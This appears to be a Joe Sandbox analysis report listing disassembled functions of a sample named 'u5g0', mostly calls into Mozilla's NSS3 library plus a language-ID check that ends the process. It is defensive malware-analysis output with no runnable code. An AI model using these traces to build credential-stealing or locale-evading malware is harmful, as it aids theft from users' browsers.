PR_EnterMonitor.NSS3(8B105D8B,?,?,6BD080E3,00000000), ref: 6BD05BD6

Part of subcall function 6BD39090: TlsGetValue.KERNEL32 ref: 6BD390AB
Part of subcall function 6BD39090: TlsGetValue.KERNEL32 ref: 6BD390C9
Part of subcall function 6BD39090: EnterCriticalSection.KERNEL32 ref: 6BD390E5
Part of subcall function 6BD39090: TlsGetValue.KERNEL32 ref: 6BD39116
Part of subcall function 6BD39090: LeaveCriticalSection.KERNEL32 ref: 6BD3913F

PR_EnterMonitor.NSS3(840FC085,?,?,6BD080E3,00000000), ref: 6BD05BED
PR_EnterMonitor.NSS3(07890478,?,?,6BD080E3,00000000), ref: 6BD05C04
PR_EnterMonitor.NSS3(000000F4,?,?,6BD080E3,00000000), ref: 6BD05C1B
PR_Unlock.NSS3(0140BCE8,?,?,6BD080E3,00000000), ref: 6BD05C4C
PR_Unlock.NSS3(08C48300,?,?,6BD080E3,00000000), ref: 6BD05C5F
PR_ExitMonitor.NSS3(8B105D8B,?,?,6BD080E3,00000000), ref: 6BD05C76
PR_ExitMonitor.NSS3(840FC085,?,?,6BD080E3,00000000), ref: 6BD05C8D
PR_ExitMonitor.NSS3(07890478,?,?,6BD080E3,00000000), ref: 6BD05CA4
PR_ExitMonitor.NSS3(000000F4,?,?,6BD080E3,00000000), ref: 6BD05CBB

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: Monitor$Enter$Exit$Value$CriticalSectionUnlock$Leave
String ID:
API String ID: 3915314664-0
Opcode ID: 400af2f14c3b5da629196a8bda874bb057da37966c5574ee3567f472f7bc489b
Instruction ID: a6f27d652bb2e4ac8833e700aa56b53316c5a08b401ef240424d86349896dbe2
Opcode Fuzzy Hash: 400af2f14c3b5da629196a8bda874bb057da37966c5574ee3567f472f7bc489b
Instruction Fuzzy Hash: 242121F4A106109FDA219F35ED436D7B3B1AB1121CF440934D94B8A222EB3EF615C756

Uniqueness

Uniqueness Score: -1.00%

Function 6BCFFB20 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 216COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6BCFFC3E

Part of subcall function 6BCC8800: TlsGetValue.KERNEL32(?,6BCD085A,00000000,?,6BC78369,?), ref: 6BCC8821
Part of subcall function 6BCC8800: TlsGetValue.KERNEL32(?,?,6BCD085A,00000000,?,6BC78369,?), ref: 6BCC883D
Part of subcall function 6BCC8800: EnterCriticalSection.KERNEL32(?,?,?,6BCD085A,00000000,?,6BC78369,?), ref: 6BCC8856
Part of subcall function 6BCC8800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6BCC8887
Part of subcall function 6BCC8800: PR_Unlock.NSS3(?,?,?,?,6BCD085A,00000000,?,6BC78369,?), ref: 6BCC8899

PR_SetError.NSS3(FFFFE005,00000000), ref: 6BCFFC52
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BCFFD4F
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BCFFD6B
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BCFFD81
memcpy.VCRUNTIME140(?,-00000079,00000020), ref: 6BCFFDDE

Part of subcall function 6BD05B40: PR_GetIdentitiesLayer.NSS3 ref: 6BD05B56

memcpy.VCRUNTIME140(?,?,?), ref: 6BCFFDFE

Strings

NULL, xrefs: 6BCFFC1D

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$ErrorValuememcpy$CondCriticalEnterIdentitiesLayerSectionUnlockWait
String ID: NULL
API String ID: 4197343211-324932091
Opcode ID: 5534543a58de3dddaa2c376ae55dbdc6815d637a8b1a6ae34d81e91c1b16093a
Instruction ID: c9d801d3b6373b858157dd1e25dcb68131a53de1de7a706bda3fd3216a81f1e3
Opcode Fuzzy Hash: 5534543a58de3dddaa2c376ae55dbdc6815d637a8b1a6ae34d81e91c1b16093a
Instruction Fuzzy Hash: D091CC71D116098FEB60CF69C880BAAB7B5FF49304F0041ADE86997351EB38AA81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6BCA2BF0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 66COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetMechanismInfo), ref: 6BCA2C0C
PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6BCA2C27

Part of subcall function 6BD809D0: PR_Now.NSS3 ref: 6BD80A22
Part of subcall function 6BD809D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6BD80A35
Part of subcall function 6BD809D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6BD80A66
Part of subcall function 6BD809D0: PR_GetCurrentThread.NSS3 ref: 6BD80A70
Part of subcall function 6BD809D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6BD80A9D
Part of subcall function 6BD809D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6BD80AC8
Part of subcall function 6BD809D0: PR_vsmprintf.NSS3(?,?), ref: 6BD80AE8
Part of subcall function 6BD809D0: EnterCriticalSection.KERNEL32(?), ref: 6BD80B19
Part of subcall function 6BD809D0: OutputDebugStringA.KERNEL32(00000000), ref: 6BD80B48
Part of subcall function 6BD809D0: _PR_MD_UNLOCK.NSS3(?), ref: 6BD80C76
Part of subcall function 6BD809D0: PR_LogFlush.NSS3 ref: 6BD80C7E

PR_LogPrint.NSS3( type = 0x%x,?), ref: 6BCA2C40

Part of subcall function 6BD809D0: OutputDebugStringA.KERNEL32(?), ref: 6BD80B88
Part of subcall function 6BD809D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6BD80C5D
Part of subcall function 6BD809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6BD80C8D
Part of subcall function 6BD809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6BD80C9C
Part of subcall function 6BD809D0: OutputDebugStringA.KERNEL32(?), ref: 6BD80CD1
Part of subcall function 6BD809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6BD80CEC
Part of subcall function 6BD809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6BD80CFB
Part of subcall function 6BD809D0: OutputDebugStringA.KERNEL32(00000000), ref: 6BD80D16
Part of subcall function 6BD809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6BD80D26
Part of subcall function 6BD809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6BD80D35
Part of subcall function 6BD809D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6BD80D65
Part of subcall function 6BD809D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6BD80D70
Part of subcall function 6BD809D0: _PR_MD_UNLOCK.NSS3(?), ref: 6BD80D90
Part of subcall function 6BD809D0: free.MOZGLUE(00000000), ref: 6BD80D99

PR_LogPrint.NSS3( pInfo = 0x%p,?), ref: 6BCA2C59

Part of subcall function 6BD809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6BD80BAB
Part of subcall function 6BD809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6BD80BBA
Part of subcall function 6BD809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6BD80D7E

Strings

C_GetMechanismInfo, xrefs: 6BCA2C07
type = 0x%x, xrefs: 6BCA2C3B
pInfo = 0x%p, xrefs: 6BCA2C54
slotID = 0x%x, xrefs: 6BCA2C22

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: DebugOutputStringfflush$Printfwrite$R_snprintf$CriticalCurrentEnterExplodeFlushR_vsmprintfR_vsnprintfSectionThreadTimefputcfreememcpy
String ID: pInfo = 0x%p$ slotID = 0x%x$ type = 0x%x$C_GetMechanismInfo
API String ID: 2688868551-112346095
Opcode ID: 6986b662aa9d087a60488dbea82093f845c60be5d82cf6330a5eba8f632dbc18
Instruction ID: 7e3ecb6be19f5c7fbb3c7bb85db20444ee0627277fe151f702261984c05fc544
Opcode Fuzzy Hash: 6986b662aa9d087a60488dbea82093f845c60be5d82cf6330a5eba8f632dbc18
Instruction Fuzzy Hash: 1B212C75111111AFFB009F65DD98E55FB65EBC736EF088025E988AF211E738CA44CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6BC7DA40 Relevance: 13.7, APIs: 9, Instructions: 229threadtimeCOMMON

Download Yara Rule

APIs

CERT_CheckCertValidTimes.NSS3(00000001,?,?,?,?,?,00000001,?,00000000), ref: 6BC7DA78

Part of subcall function 6BC71DD0: DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6BC71E0B
Part of subcall function 6BC71DD0: DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6BC71E24

PR_SetError.NSS3(FFFFE015,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 6BC7DC04
PR_GetCurrentThread.NSS3(?,?,?,?,?,?,00000001,?,00000000), ref: 6BC7DA8E

Part of subcall function 6BD39BF0: TlsGetValue.KERNEL32(?,?,?,6BD80A75), ref: 6BD39C07

Part of subcall function 6BC7C9A0: PORT_ArenaAlloc_Util.NSS3(00000000,00000018,?,00000001,00000000,?,6BC7D864,?,00000000,?), ref: 6BC7C9AE

PR_SetError.NSS3(FFFFE05A,00000000,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 6BC7DB5D
PR_GetCurrentThread.NSS3(?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 6BC7DB70
PR_SetError.NSS3(FFFFE05B,00000000,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 6BC7DB98
PR_GetCurrentThread.NSS3(?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 6BC7DBAD
PR_GetCurrentThread.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 6BC7DC19
PR_GetCurrentThread.NSS3 ref: 6BC7DCAB

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: CurrentThread$ErrorUtil$Choice_DecodeTime$Alloc_ArenaCertCheckTimesValidValue
String ID:
API String ID: 3515923558-0
Opcode ID: ab68ebeb1f2efad74f198d2dc41a1d5a8896b04e942445f0d332bf8e26fa92c0
Instruction ID: efefcd3383abae8338c67ceac43a406cfdfe4ee5c81593b42c81feee76405ba8
Opcode Fuzzy Hash: ab68ebeb1f2efad74f198d2dc41a1d5a8896b04e942445f0d332bf8e26fa92c0
Instruction Fuzzy Hash: 9D71F6B6A102059BDF10AFA8DC81BAF7775AF84324F144178ED199B251F739EB10C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 6BCABAA0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageVerifyFinal), ref: 6BCABAC6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6BCABAF4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6BCABB03

Part of subcall function 6BD8D930: PL_strncpyz.NSS3(?,?,?), ref: 6BD8D963

PR_LogPrint.NSS3(?,00000000), ref: 6BCABB19

Strings

C_MessageVerifyFinal, xrefs: 6BCABAC1
hSession = 0x%x, xrefs: 6BCABADE, 6BCABAEE
(CK_INVALID_HANDLE), xrefs: 6BCABAFC

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageVerifyFinal
API String ID: 332880674-1513912125
Opcode ID: ef077cb8cafc0d87ae9b7e2b9669237392c1f3795c1ece8f664976590206ee96
Instruction ID: 059b844aa63af464647956780e55ae63472e232e9917b381762a487330d5badf
Opcode Fuzzy Hash: ef077cb8cafc0d87ae9b7e2b9669237392c1f3795c1ece8f664976590206ee96
Instruction Fuzzy Hash: D8213731500119AFE700DFA4ED89F2AB3A4EB8676DF044025E4499F191EB3CDA08C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 6BC5BB80 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6BC621BC), ref: 6BC5BB8C
PR_SetError.NSS3(FFFFE890,00000000), ref: 6BC5BBEB
InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6BC5BBFB
GetLastError.KERNEL32 ref: 6BC5BC03
PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6BC5BC19
free.MOZGLUE(00000000), ref: 6BC5BC22

Strings

ffff, xrefs: 6BC5BB9B

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: Error$CountCriticalInitializeLastSectionSpincallocfree
String ID: ffff
API String ID: 2588245028-3827681309
Opcode ID: 91d2823623a282f7178467976cc42d309b5ebd4dff76b4d07aa7072301e241f5
Instruction ID: fa0644708d9606c652775537a8467d3bf393a8c6446abec6924367a8e32fd6d8
Opcode Fuzzy Hash: 91d2823623a282f7178467976cc42d309b5ebd4dff76b4d07aa7072301e241f5
Instruction Fuzzy Hash: 7C112C75A407016BEB109F6AAD06B0BBE98EF45B15F04003DF58ADA640EB74E120CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00418843 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0041884F

Part of subcall function 00417B2C: __getptd_noexit.LIBCMT ref: 00417B2F
Part of subcall function 00417B2C: __amsg_exit.LIBCMT ref: 00417B3C

__amsg_exit.LIBCMT ref: 0041886F
__lock.LIBCMT ref: 0041887F
InterlockedDecrement.KERNEL32(?), ref: 0041889C
_free.LIBCMT ref: 004188AF
InterlockedIncrement.KERNEL32(00423530), ref: 004188C7

Strings

05B, xrefs: 004188B5, 004188BD

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID: 05B
API String ID: 3470314060-3788103304
Opcode ID: cb1538446801220004b0e94d2aebbf41e1672ae537431284a663a37179733970
Instruction ID: f16d68fd9582ac4125616c5e50f94de62243aa4c7be40d45a23fde697d24a6fa
Opcode Fuzzy Hash: cb1538446801220004b0e94d2aebbf41e1672ae537431284a663a37179733970
Instruction Fuzzy Hash: 4501AD32A05621ABD720BF6A98057CA7770AF04725F90402FF810A3390CB7CA9C2CBDD

Uniqueness

Uniqueness Score: -1.00%

Function 6BD82B70 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41stringCOMMON

Download Yara Rule

APIs

strstr.VCRUNTIME140(?,.dll), ref: 6BD82B81
PR_smprintf.NSS3(%s%s,?,.dll), ref: 6BD82B98
PR_smprintf.NSS3(%s\%s%s,?,?,.dll), ref: 6BD82BB4
PR_smprintf.NSS3(6BDAAAF9,?), ref: 6BD82BC4

Strings

%s\%s, xrefs: 6BD82B93
%s\%s%s, xrefs: 6BD82BAF
.dll, xrefs: 6BD82B7B, 6BD82BA8, 6BD82BCE

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: R_smprintf$strstr
String ID: %s\%s$%s\%s%s$.dll
API String ID: 3360132973-3501675219
Opcode ID: 22f09b71263082720383b04134ba51a28d62f2e795c6eb84decfecfd11fd0b81
Instruction ID: a34a6d3f938682bb2cd6796145d1418be985946947f79f5b109b570531de7220
Opcode Fuzzy Hash: 22f09b71263082720383b04134ba51a28d62f2e795c6eb84decfecfd11fd0b81
Instruction Fuzzy Hash: 89F0822640751472851017AAEC05D973F1DCCD26BAB4401AEBC19BE219F61DF228D0FA

Uniqueness

Uniqueness Score: -1.00%

Function 00413430 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetUserDefaultLangID.KERNEL32(?,?,004136E6,0041D6E3), ref: 00413434
ExitProcess.KERNEL32 ref: 00413465
ExitProcess.KERNEL32 ref: 0041346F
ExitProcess.KERNEL32 ref: 00413479
ExitProcess.KERNEL32 ref: 00413483
ExitProcess.KERNEL32 ref: 0041348D

Strings

*, xrefs: 0041344C

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: ExitProcess$DefaultLangUser
String ID: *
API String ID: 1494266314-163128923
Opcode ID: b54c11c67429caad35af0389be56d96782f86342cf804ea28b4a9cbeb8073ebc
Instruction ID: 75b540bad49881e9417c8f8c63d74940121d586cf5f959f7794e893d96f52075
Opcode Fuzzy Hash: b54c11c67429caad35af0389be56d96782f86342cf804ea28b4a9cbeb8073ebc
Instruction Fuzzy Hash: 4BF05830508608EFE364EFE0EF0976CBBB1EB8E703F001195E60A86290CA744A119B65

Uniqueness

Uniqueness Score: -1.00%

Function 6BC6AB70 Relevance: 12.1, APIs: 8, Instructions: 104pipeCOMMON

Download Yara Rule

APIs

CreatePipe.KERNEL32(?,?,?,00000000), ref: 6BC6ABAF
GetLastError.KERNEL32 ref: 6BC6AC44
PR_SetError.NSS3(FFFFE896,00000000), ref: 6BC6AC50

Part of subcall function 6BD1C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6BD1C2BF

PR_SetError.NSS3(FFFFE890,00000000), ref: 6BC6AC62
CloseHandle.KERNEL32(?), ref: 6BC6AC75
CloseHandle.KERNEL32(?), ref: 6BC6AC7A

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: Error$CloseHandle$CreateLastPipeValue
String ID:
API String ID: 4247729451-0
Opcode ID: 2f204ea5ea0620fa589a50f5b9f37df593332f03ad63d172740cadd598f825a4
Instruction ID: b778271b33c21be3293348ab18275716d24520476f2345f5273e648f38cc381f
Opcode Fuzzy Hash: 2f204ea5ea0620fa589a50f5b9f37df593332f03ad63d172740cadd598f825a4
Instruction Fuzzy Hash: 5931BF74900115AFEB04CFA8D885D6ABBF8FF89354B148068E5499F361E736ED41CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 6BD81B40 Relevance: 12.1, APIs: 8, Instructions: 99COMMON

Download Yara Rule

APIs

PR_Lock.NSS3(?), ref: 6BD81B50

Part of subcall function 6BD39BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6BC61A48), ref: 6BD39BB3
Part of subcall function 6BD39BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6BC61A48), ref: 6BD39BC8

PR_NotifyAllCondVar.NSS3(?), ref: 6BD81B75
PR_NotifyAllCondVar.NSS3(?), ref: 6BD81B80
PR_WaitCondVar.NSS3(?,000000FF), ref: 6BD81B93
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6BD81BB0
PR_NotifyCondVar.NSS3(?), ref: 6BD81BFD
PR_Unlock.NSS3(?), ref: 6BD81C3E
PR_SetError.NSS3(FFFFE8D4,00000000), ref: 6BD81C54

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: Cond$Notify$Error$CriticalEnterLockSectionUnlockValueWait
String ID:
API String ID: 3317306279-0
Opcode ID: 27366bb80b27bfdb2248fc593bf6adad6599a3958e8e9573630f8a055f660a5d
Instruction ID: d96b3dee5a1fcd1fa318990f404f374a22a836c35c7ce49bd463b1d32636560d
Opcode Fuzzy Hash: 27366bb80b27bfdb2248fc593bf6adad6599a3958e8e9573630f8a055f660a5d
Instruction Fuzzy Hash: 5931B279A00625EFD710CF19D841E01F7B1FF49725B148668D8A94BBA0E376F964CBC0

Uniqueness

Uniqueness Score: -1.00%

Function 6BC94BA0 Relevance: 12.1, APIs: 8, Instructions: 80COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6BC9A6A2,?,?,00000000), ref: 6BC94BB9
EnterCriticalSection.KERNEL32 ref: 6BC94BD2
TlsGetValue.KERNEL32 ref: 6BC94BEF
EnterCriticalSection.KERNEL32 ref: 6BC94C08
PL_HashTableLookup.NSS3 ref: 6BC94C21
PR_Unlock.NSS3 ref: 6BC94C2E
PR_Now.NSS3 ref: 6BC94C3D
PR_Unlock.NSS3 ref: 6BC94C62

Part of subcall function 6BC607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6BBF204A), ref: 6BC607AD
Part of subcall function 6BC607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BBF204A), ref: 6BC607CD
Part of subcall function 6BC607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BBF204A), ref: 6BC607D6
Part of subcall function 6BC607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6BBF204A), ref: 6BC607E4
Part of subcall function 6BC607A0: TlsSetValue.KERNEL32(00000000,?,6BBF204A), ref: 6BC60864
Part of subcall function 6BC607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6BC60880
